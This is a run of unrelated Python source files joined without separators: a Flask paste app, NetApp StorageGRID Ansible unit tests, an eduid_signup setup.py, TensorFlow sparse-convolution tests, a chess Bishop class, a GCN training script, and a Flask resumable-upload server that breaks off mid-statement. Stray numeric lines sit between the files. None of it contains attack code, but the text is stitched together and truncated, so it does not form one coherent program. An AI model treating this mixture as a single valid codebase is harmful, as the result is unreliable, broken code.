uploaded_file: paste_file = PasteFile.create_by_upload(uploaded_file) db.session.add(paste_file) db.session.commit() width, height = paste_file.image_size return jsonify({ 'url': paste_file.url_i, 'short_url': paste_file.url_s, 'origin_filename': paste_file.filename, 'hash': paste_file.filehash, 'width': width, 'height': height }) return abort(404) @app.route('/p/') def perview(filehash): paste_file = PasteFile.get_by_filehash(filehash) if not paste_file: filepath = get_file_path(filehash) if not(os.path.exists(filepath)) and not(os.path.islink(filepath)): return abort(404) paste_file = PasteFile.create_by_old_paste(filehash) db.session.add(paste_file) db.session.commit() @app.route('/s/') def s(symlik): paste_file = PasteFile.get_by_symlik(symlik) return redirect(paste_file.url_p) if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) """TODO""" import pytest def test_dummy(): """Fake test to get boilerplate going""" assert True # (c) 2020, NetApp, Inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) """ unit tests NetApp StorageGRID Grid Group Ansible module: na_sg_grid_group""" from __future__ import absolute_import, division, print_function __metaclass__ = type import json import pytest import sys try: from requests import Response except ImportError: if sys.version_info < (2, 7): pytestmark = pytest.mark.skip('Skipping Unit Tests on 2.6 as requests is not available') else: raise from ansible_collections.netapp.storagegrid.tests.unit.compat import unittest from ansible_collections.netapp.storagegrid.tests.unit.compat.mock import ( patch, Mock, ) from ansible.module_utils import basic from ansible.module_utils._text import to_bytes from ansible_collections.netapp.storagegrid.plugins.modules.na_sg_grid_group import ( SgGridGroup as grid_group_module, ) # REST API canned responses when mocking send_request SRR = { # common responses "empty_good": ({"data": []}, None), "not_found": ( {"status": "error", "code": 404, "data": {}}, {"key": "error.404"}, ), "end_of_sequence": (None, "Unexpected call to send_request"), "generic_error": (None, "Expected error"), "delete_good": ({"code": 204}, None), "grid_groups": ( { "data": [ { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": True, "maintenance": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } ] }, None, ), "grid_group_record": ( { "data": { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": True, "maintenance": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } }, None, ), "grid_group_record_update": ( { "data": { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": False, "maintenance": True, "ilm": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } }, None, ), } def set_module_args(args): """prepare arguments so that they will be picked up during module creation""" args = json.dumps({"ANSIBLE_MODULE_ARGS": args}) basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access class AnsibleExitJson(Exception): """Exception class to be raised by module.exit_json and caught by the test case""" pass class AnsibleFailJson(Exception): """Exception class to be raised by module.fail_json and caught by the test case""" pass def exit_json(*args, **kwargs): # pylint: disable=unused-argument """function to patch over exit_json; package return data into an exception""" if "changed" not in kwargs: kwargs["changed"] = False raise AnsibleExitJson(kwargs) def fail_json(*args, **kwargs): # pylint: disable=unused-argument """function to patch over fail_json; package return data into an exception""" kwargs["failed"] = True raise AnsibleFailJson(kwargs) class TestMyModule(unittest.TestCase): """ a group of related Unit Tests """ def setUp(self): self.mock_module_helper = patch.multiple( basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json ) self.mock_module_helper.start() self.addCleanup(self.mock_module_helper.stop) def set_default_args_fail_check(self): return dict( { "display_name": "TestGroup", "management_policy": { "maintenance": True, "ilm": True, "root_access": False, }, "auth_token": "", "validate_certs": False, } ) def set_default_args_pass_check(self): return dict( { "state": "present", "display_name": "TestGroup", "unique_name": "group/testgroup", "management_policy": { "maintenance": True, "ilm": True, "root_access": False, }, "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def set_args_create_na_sg_grid_group(self): return dict( { "state": "present", "display_name": "TestGridGroup", "unique_name": "group/testgridgroup", "management_policy": { "tenant_accounts": True, "metrics_query": True, "maintenance": True, }, "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def set_args_delete_na_sg_grid_group(self): return dict( { "state": "absent", "unique_name": "group/testgridgroup", "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def test_module_fail_when_required_args_missing(self): """ required arguments are reported as errors """ with pytest.raises(AnsibleFailJson) as exc: set_module_args(self.set_default_args_fail_check()) grid_group_module() print( "Info: test_module_fail_when_required_args_missing: %s" % exc.value.args[0]["msg"] ) def test_module_fail_when_required_args_present(self): """ required arguments are reported as errors """ with pytest.raises(AnsibleExitJson) as exc: set_module_args(self.set_default_args_pass_check()) grid_group_module() exit_json(changed=True, msg="Induced arguments check") print( "Info: test_module_fail_when_required_args_present: %s" % exc.value.args[0]["msg"] ) assert exc.value.args[0]["changed"] def test_module_fail_with_bad_unique_name(self): """ error returned if unique_name doesn't start with group or federated_group """ with pytest.raises(AnsibleFailJson) as exc: args = self.set_default_args_pass_check() args["unique_name"] = "noprefixgroup" set_module_args(args) grid_group_module() print( "Info: test_module_fail_with_bad_unique_name: %s" % exc.value.args[0]["msg"] ) @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_create_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_create_na_sg_grid_group()) my_obj = grid_group_module() mock_request.side_effect = [ SRR["not_found"], # get SRR["grid_group_record"], # post SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_create_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_idempotent_create_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_create_na_sg_grid_group()) my_obj = grid_group_module() mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_idempotent_create_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert not exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_update_na_sg_grid_group_pass(self, mock_request): args = self.set_args_create_na_sg_grid_group() args["management_policy"]["tenant_accounts"] = True args["management_policy"]["metrics_query"] = False args["management_policy"]["ilm"] = False set_module_args(args) my_obj = grid_group_module() mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["grid_group_record_update"], # put SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_update_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_delete_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_delete_na_sg_grid_group()) my_obj = grid_group_module() mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["delete_good"], # delete SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_delete_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] import os import sys from setuptools import setup, find_packages try: from babel.messages import frontend as babel except ImportError: print "Babel is not installed, you can't localize this package" cmdclass = {} else: cmdclass = { 'compile_catalog': babel.compile_catalog, 'extract_messages': babel.extract_messages, 'init_catalog': babel.init_catalog, 'update_catalog': babel.update_catalog } here = os.path.abspath(os.path.dirname(__file__)) README = open(os.path.join(here, 'README.rst')).read() CHANGES = open(os.path.join(here, 'CHANGES.rst')).read() version = '0.4.9' requires = [ 'eduid_am >= 0.6.0, < 0.7.0', 'vccs_client >= 0.4.1, < 0.5.0', 'wsgi_ratelimit >= 0.1', 'eduid_userdb >= 0.4.0b9', 'eduid_common[webapp]>=0.1.3b5', 'pyramid == 1.5.4', 'pyramid_debugtoolbar == 2.3', 'pyramid_jinja2 == 2.3.3', 'jinja2<2.9', # Templates breaks with jinja2 2.9 'pyramid_mailer == 0.14', 'pyramid_tm == 1.1.1', 'pyramid_sna == 0.3.2', 'waitress == 0.8.9', 'requests >= 2.1.18', # Validate recaptcha with requests 'pwgen == 0.4', 'proquint == 0.2.0', 'gunicorn == 19.3.0', ] if sys.version_info[0] < 3: # Babel does not work with Python 3 requires.append('Babel==1.3') test_requires = [ 'WebTest==1.4.3', 'mock', 'eduid_signup_amp>=0.2.9b0', ] docs_extras = [ 'Sphinx==1.1.3' ] testing_extras = test_requires + [ 'nose==1.2.1', 'coverage==3.6', 'nosexcover==1.0.8', ] waitress_extras = requires + [ 'waitress==0.8.2', ] setup( name='eduid_signup', version=version, description='eduID Sign Up application', long_description=README + '\n\n' + CHANGES, # TODO: add classifiers classifiers=[ # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers ], keywords='identity federation saml', author='', url='https://github.com/SUNET/eduid-signup', license='BSD', packages=find_packages(), include_package_data=True, zip_safe=False, install_requires=requires, tests_require=test_requires, extras_require={ 'testing': testing_extras, 'docs': docs_extras, 'waitress': waitress_extras, }, test_suite='eduid_signup', entry_points="""\ [paste.app_factory] main = eduid_signup:main """, ) src/compas/datastructures/mesh/operations/__init__.py from __future__ import print_function, division, absolute_import from .collapse import * from .insert import * from .split import * from .swap import * from .weld import * __all__ = [name for name in dir() if not name.startswith('_')] import tensorflow as tf from tensorflow.python.platform import test from absl.testing import parameterized from custom_helper_op import sparse_conv2d, sparse_conv3d, SparseConv3DLayer import numpy as np from tensorflow.python.ops import gradient_checker_v2 import time # class SparseConv2DTest(test.TestCase, parameterized.TestCase): # @parameterized.parameters( # (1, 500, 500, 30, 20, (3, 3)), # (2, 500, 600, 30, 20, (5, 5)), # ) # def testForward(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]) # filters = np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]) # base_plane = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]) # offsets = np.random.random([BATCH_SIZE, IN_CHANNELS]) # default_value = tf.random.uniform([], dtype=images.dtype) # start = time.time() # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # my_time = time.time() - start # # print(res.numpy()[0, 1, 1, 0], tf.reduce_sum(filters[0, :, :, :]*images[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # images_nn = tf.pad(tf.constant(images, dtype=images.dtype), [[0, 0], [KERNEL_SIZE[0]//2, KERNEL_SIZE[0]//2], [KERNEL_SIZE[1]//2, KERNEL_SIZE[1]//2], [0, 0]], # mode="CONSTANT", constant_values=default_value) # # print(images_nn[0, 0, 0, 0].numpy()) # # print(res.numpy()[0, 0, 0, 0], tf.reduce_sum(filters[0, :, :, :]*images_nn[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # start = time.time() # res_nn = tf.nn.conv2d(images_nn, tf.transpose(tf.constant(filters, dtype=filters.dtype), [1, 2, 3, 0]), strides=(1, 1, 1, 1), padding="VALID", dilations=(1, 1, 1, 1)) # nn_time = time.time() - start # print("my ", my_time/1000, " nn ", nn_time/1000) # self.assertShapeEqual(res.numpy(), res_nn) # self.assertAllClose(res, res_nn) # print(tf.shape(res)) # @parameterized.parameters( # (1, 1024, 2048, 30, 20, (3, 3)), # (2, 1024, 2048, 30, 20, (5, 5)), # ) # def testGradTime(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]), dtype=tf.float32) # filters = tf.convert_to_tensor(np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]), dtype=tf.float32) # base_plane = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]), dtype=tf.float32) # offsets = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IN_CHANNELS]), dtype=tf.float32) # default_value = tf.random.uniform([], dtype=images.dtype) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters, base_plane, default_value]) # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # res = tf.reduce_mean(res) # my_forward_time = time.time() - start # start = time.time() # grad = tape.gradient(res, [images, filters, base_plane, default_value]) # my_backforward_time = time.time() - start # # print(res.numpy()[0, 1, 1, 0], tf.reduce_sum(filters[0, :, :, :]*images[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # images_nn = tf.pad(tf.constant(images, dtype=images.dtype), [[0, 0], [KERNEL_SIZE[0]//2, KERNEL_SIZE[0]//2], [KERNEL_SIZE[1]//2, KERNEL_SIZE[1]//2], [0, 0]], # mode="CONSTANT", constant_values=default_value) # # print(images_nn[0, 0, 0, 0].numpy()) # # print(res.numpy()[0, 0, 0, 0], tf.reduce_sum(filters[0, :, :, :]*images_nn[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters]) # res_nn = tf.nn.conv2d(images_nn, tf.transpose(filters, [1, 2, 3, 0]), strides=(1, 1, 1, 1), padding="VALID", dilations=(1, 1, 1, 1)) # res = tf.reduce_mean(res_nn) # nn_forward_time = time.time() - start # nn_grad = tape.gradient(res, [images, filters, base_plane, default_value]) # nn_backforward_time = time.time() - start # print("my forward ", my_forward_time/1000, " my backfoward ", my_backforward_time/1000, " nn forward ", nn_forward_time/1000, " nn backforward ", nn_backforward_time/1000) # self.assertShapeEqual(grad[0].numpy(), nn_grad[0]) # self.assertAllClose(grad[0], nn_grad[0]) # @parameterized.parameters( # (1, 10, 20, 30, 20, (3, 3)), # (2, 10, 20, 30, 20, (3, 3)), # ) # def testGradientFloat64(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # @tf.function # def test_check(*args): # cost = sparse_conv2d(*args) # return tf.reduce_mean(cost) # with self.cached_session(): # images = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]) # filters = np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]) # base_plane = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]) # offsets = np.random.random([BATCH_SIZE, IN_CHANNELS]) # default_value = tf.constant(0, dtype=images.dtype) # # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # theoretical, numerical = gradient_checker_v2.compute_gradient(test_check, [images, filters, base_plane, default_value, offsets]) # # err = gradient_checker_v2.max_error(theoretical, numerical) # self.assertAllClose(theoretical[0], numerical[0]) # self.assertAllClose(theoretical[1], numerical[1]) # # self.assertAllClose(theoretical[2], numerical[2]) # self.assertAllClose(theoretical[3], numerical[3]) class SparseConv3DTest(test.TestCase, parameterized.TestCase): @parameterized.parameters( (1, 128, 160, 16, 32, 4, 3, (3, 3, 3), (1, 1, 1)), (2, 128, 160, 16, 48, 5, 6, (5, 3, 3), (1, 1, 1)), (2, 32, 40, 16, 48, 90, 100, (3, 3, 3), (2, 2, 2)), ) def testForward(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE, DILATIONS_SIZE): tf.random.set_seed(np.random.randint(1, tf.int64.max)) images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=images_all.dtype) base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # base_plane = (base_plane//2)*2 # test_start_d = 5 # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d default_value = tf.random.uniform([], dtype=images_all.dtype) # default_value = tf.constant(0, dtype=images_all.dtype) half_kernel = np.array(KERNEL_SIZE)//2 gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) mask = tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) mask = tf.reduce_any(mask, axis=-2) images_all = tf.where(mask[..., None], images_all, default_value) pad_size = np.multiply(half_kernel,np.array(DILATIONS_SIZE)) assert(len(pad_size) == 3) images_nn = tf.pad(images_all, [[0, 0], [pad_size[0], pad_size[0]], [pad_size[1], pad_size[1]], [pad_size[2], pad_size[2]], [0, 0]], mode="CONSTANT", constant_values=default_value) start = time.time() res = sparse_conv3d(images, filters, default_value, base_plane, dilations=DILATIONS_SIZE, strides=(1, 1, 1)) my_time = time.time() - start # filters_nn = tf.transpose(filters, [1, 2, 3, 4, 0]) start = time.time() res_nn = tf.nn.conv3d(images_nn, filters, strides=(1, 1, 1, 1, 1), padding="VALID", dilations=(1, *DILATIONS_SIZE, 1)) nn_time = time.time() - start gather_indice = (base_plane[:, ::1, ::1, :] + 0)//1 + np.arange(0, IMAGE_DEPTH//1, dtype=np.int32)[None, None, None, :] print(tf.shape(res_nn), tf.shape(res)) res_nn = tf.gather_nd(res_nn, gather_indice[..., None], batch_dims=3) print("my ", my_time/1000, " nn ", nn_time/1000) # test_out = tf.reduce_sum(images[:, None, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :KERNEL_SIZE[2], :]*filters[None, ...], axis=(2, 3, 4, 5)) # print(test_out, base_plane[:, :KERNEL_SIZE[0], :KERNEL_SIZE[1]]) # print(res[:, half_kernel[0], half_kernel[1], half_kernel[2], :]) # print(res_nn[:, half_kernel[0], half_kernel[1], half_kernel[2], :]) self.assertShapeEqual(res.numpy(), res_nn) self.assertAllClose(res, res_nn, rtol=1e-5) sc3d = SparseConv3DLayer(3, (3, 3, 3), dtype=images.dtype) sc3d([images, base_plane]) # @parameterized.parameters( # (1, 10, 20, 3, 5, 4, 3, (3, 3, 3)), # # (2, 4, 6, 5, 8, 2, 1, (5, 3, 3)), # # (1, 128, 160, 32, 64, 4, 3, (3, 3, 3)), # # (2, 128, 160, 32, 96, 30, 20, (5, 3, 3)), # ) # def testGradTime(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) # filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=tf.float32) # base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # # test_start_d = 5 # # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d # default_value = tf.random.uniform([], dtype=images_all.dtype) # # default_value = tf.constant(0, dtype=images_all.dtype) # half_kernel = np.array(KERNEL_SIZE)//2 # gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] # images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) # mask = tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) # mask = tf.reduce_any(mask, axis=-2) # images_all = tf.where(mask[..., None], images_all, default_value) # images_nn = tf.pad(images_all, [[0, 0], [half_kernel[0], half_kernel[0]], [half_kernel[1], half_kernel[1]], [half_kernel[2], half_kernel[2]], [0, 0]], # mode="CONSTANT", constant_values=default_value) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters, default_value]) # res = sparse_conv3d(images, filters, default_value, base_plane) # res = tf.reduce_mean(res) # my_forward_time = time.time() - start # start = time.time() # grad = tape.gradient(res, [images, filters, default_value]) # my_backforward_time = time.time() - start # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters]) # res_nn = tf.nn.conv3d(images, filters, strides=(1, 1, 1, 1, 1), padding="SAME") # res = tf.reduce_mean(res_nn) # nn_forward_time = time.time() - start # nn_grad = tape.gradient(res, [images, filters]) # nn_backforward_time = time.time() - start # print("my forward ", my_forward_time/1000, " my backfoward ", my_backforward_time/1000, " nn forward ", nn_forward_time/1000, " nn backforward ", nn_backforward_time/1000) # self.assertShapeEqual(grad[0].numpy(), nn_grad[0]) # self.assertAllClose(grad[0], nn_grad[0]) @parameterized.parameters( (1, 10, 20, 3, 5, 4, 3, (3, 3, 3), (1, 1, 1)), (2, 4, 6, 5, 8, 2, 1, (5, 3, 3), (2, 2, 2)), ) def testGradientFloat64(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE, DILATIONS_SIZE): test_strides = (1, 1, 1) tf.random.set_seed(np.random.randint(1, tf.int64.max)) images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=images_all.dtype) base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # test_start_d = 5 # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d default_value = tf.random.uniform([], dtype=images_all.dtype) # default_value = tf.constant(0, dtype=images_all.dtype) half_kernel = np.array(KERNEL_SIZE)//2 gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) # mask = tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) # mask = tf.reduce_any(mask, axis=-2) # images_all = tf.where(mask[..., None], images_all, default_value) # images_nn = tf.pad(images_all, [[0, 0], [half_kernel[0], half_kernel[0]], [half_kernel[1], half_kernel[1]], [half_kernel[2], half_kernel[2]], [0, 0]], # mode="CONSTANT", constant_values=default_value) cost_grad_perturbation = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT//test_strides[0], (IMAGE_WIDTH + test_strides[1] - 1)//test_strides[1], (IMAGE_DEPTH + test_strides[2] - 1)//test_strides[2], OUT_CHANNELS], dtype=images_all.dtype) @tf.function def test_check(*args): cost = sparse_conv3d(*args, base_plane, dilations=DILATIONS_SIZE, dynamic_default=True, strides=test_strides) return tf.reduce_mean(cost*cost_grad_perturbation) with self.cached_session(): # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) theoretical, numerical = gradient_checker_v2.compute_gradient(test_check, [images, filters, default_value]) # err = gradient_checker_v2.max_error(theoretical, numerical) self.assertAllClose(theoretical[0], numerical[0]) self.assertAllClose(theoretical[1], numerical[1]) self.assertAllClose(theoretical[2], numerical[2]) # self.assertAllClose(theoretical[3], numerical[3]) if __name__ == "__main__": test.main()from .piece import Piece from typing import List, Tuple class Bishop(Piece): eval_white = [[-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [-1.0, 0.0, 5.0, 1.0, 1.0, 5.0, 0.0, -1.0], [-1.0, 5.0, 5.0, 1.0, 1.0, 5.0, 5.0, -1.0], [-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [-1.0, 5.0, 0.0, 0.0, 0.0, 0.0, 5.0, -1.0], [-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]] eval_black = eval_white[::-1] @staticmethod def check_laser(chessboard: List[List[str]], x: int, y: int, is_white: bool, check_mode: bool=False) -> List[Tuple[int, int]]: return Piece.get_laser((-1, -1, 1, 1, -1), chessboard, x, y, is_white, check_mode) @staticmethod def can_move(x: int, y: int, new_x: int, new_y: int, piece_in_path: bool, is_white: bool) -> bool: return abs(x-new_x) == abs(y-new_y) @staticmethod def controlled(table: List[List[bool]], chessboard: List[List[str]], x: int, y: int, is_white: bool) -> List[List[bool]]: return Piece.possible_moves((-1, -1, 1, 1, -1), table, chessboard, x, y) import argparse import torch import torch.nn.functional as F from gat_conv import GATConv from torch.nn import Linear from datasets import get_planetoid_dataset from snap_dataset import SNAPDataset from suite_sparse import SuiteSparseMatrixCollection from train_eval_cs import run import pdb from torch_geometric.nn import GCNConv from torch.nn import Parameter import os.path as osp parser = argparse.ArgumentParser() parser.add_argument('--dataset', type=str, required=True) parser.add_argument('--random_splits', type=bool, default=True) parser.add_argument('--runs', type=int, default=10) parser.add_argument('--epochs', type=int, default=200) parser.add_argument('--lr', type=float, default=0.0001) parser.add_argument('--weight_decay', type=float, default=0.0005) parser.add_argument('--early_stopping', type=int, default=10) parser.add_argument('--hidden', type=int, default=128) parser.add_argument('--dropout', type=float, default=0.5) parser.add_argument('--normalize_features', type=bool, default=True) args = parser.parse_args() class DoubleNet(torch.nn.Module): def __init__(self, dataset, num_features , num_classes): super(DoubleNet, self).__init__() self.conv1 = GCNConv(dataset.num_features, args.hidden) self.conv2 = GCNConv(args.hidden, args.hidden) self.conv1_ssl = GCNConv(dataset.num_features, args.hidden) self.conv2_ssl = GCNConv(args.hidden, int(dataset[0].num_class)) self.lin = Linear(int(dataset[0].num_class),int(dataset[0].num_class)) def reset_parameters(self): self.conv1.reset_parameters() self.conv2.reset_parameters() self.conv1_ssl.reset_parameters() self.conv2_ssl.reset_parameters() self.lin.reset_parameters() def decoder(self, z, edge_index, sigmoid=True): value = (z[edge_index[0]] * z[edge_index[1]]).sum(dim=1) return torch.sigmoid(value) if sigmoid else value def forward(self, data, pos_edge_index, neg_edge_index, edge_index, masked_nodes): x= data.x x = F.relu(self.conv1(x, edge_index)) # LAYER 1 z = self.conv2(x, edge_index) # LAYER 2 total_edge_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1) pos_pred = self.decoder(z, pos_edge_index, sigmoid=True) neg_pred = self.decoder(z, neg_edge_index, sigmoid=True) total_pred = torch.cat([pos_pred, neg_pred], dim=-1) r, c = total_edge_index[0][total_pred>0.5], total_edge_index[1][total_pred>0.5] new_index = torch.stack((torch.cat([r,c], dim= -1),(torch.cat([c,r], dim= -1))), dim=0 ) added_index = torch.cat([edge_index, new_index], dim=-1) x = data.x x = F.relu(self.conv1_ssl(x, added_index)) # LAYER 1 x = self.conv2_ssl(x, added_index) # LAYER 2 # return self.lin(F.relu(x)), z,r.size() out = self.lin(F.relu(x)) drop = torch.nn.Dropout(p=0.5) return F.log_softmax(x, dim=1), z, out, r.size(-1) # ego-Facebook com-Amazon ego-gplus ego-twitter name = "ego-Facebook" path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', name) dataset = SNAPDataset(path, name) run(dataset, DoubleNet(dataset, dataset[0].num_feature, int(dataset[0].num_class)), args.runs, args.epochs, args.lr, args.weight_decay, args.early_stopping) 100-1000 #!python import fileinput for line in fileinput.input(): print(line.replace('td class="col-result', 'td class="col-result fake-button-for-vimium')) 0 from flask import Flask, render_template, request, make_response from flask_cors import CORS from datetime import datetime, timedelta import os, uuid, base64 # metadata -> dict def metadata2dict(metadata): data = {} for field in metadata.split(','): values = field.split(' ') data[values[0]] = base64.b64decode(values[1]).decode('utf-8') if len(values) > 1 else '' return data # get saved file size ## return false if not exists def get_saved_file_size(file_id): path = f'./static/uploaded/{file_id}' if not os.path.exists(path): return False return os.path.getsize(path) # save file, resumable def save_file(file_id, content): path = f'./static/uploaded/{file_id}' # staticディレクトリに配置してダウンロードできるようにする if not os.path.isdir('./static/uploaded'): os.mkdir('./static/uploaded') with open(path, 'ab' if os.path.isfile(path) else 'wb') as f: f.write(content) # 保存済みサイズを返す return get_saved_file_size(file_id) # --- # ベースURLのルーティング関数 ## ベースURL: uWSGI環境変数から読み込みfile_id url_for = lambda url: request.environ.get('ROOT_URL', 'http://192.168.11.237:3333/') + url app = Flask(__name__) CORS(app) # url_for関数を上書き app.jinja_env.globals.update(url_for = url_for) files = {} # uploading files # home @app.route('/', methods=['GET']) def home(): return render_template('home.jinja') # create file upload @app.route('/api/files/', methods=['POST']) def upload(): data = { 'content_length': request.headers.get('Content-Length'), 'upload_length': 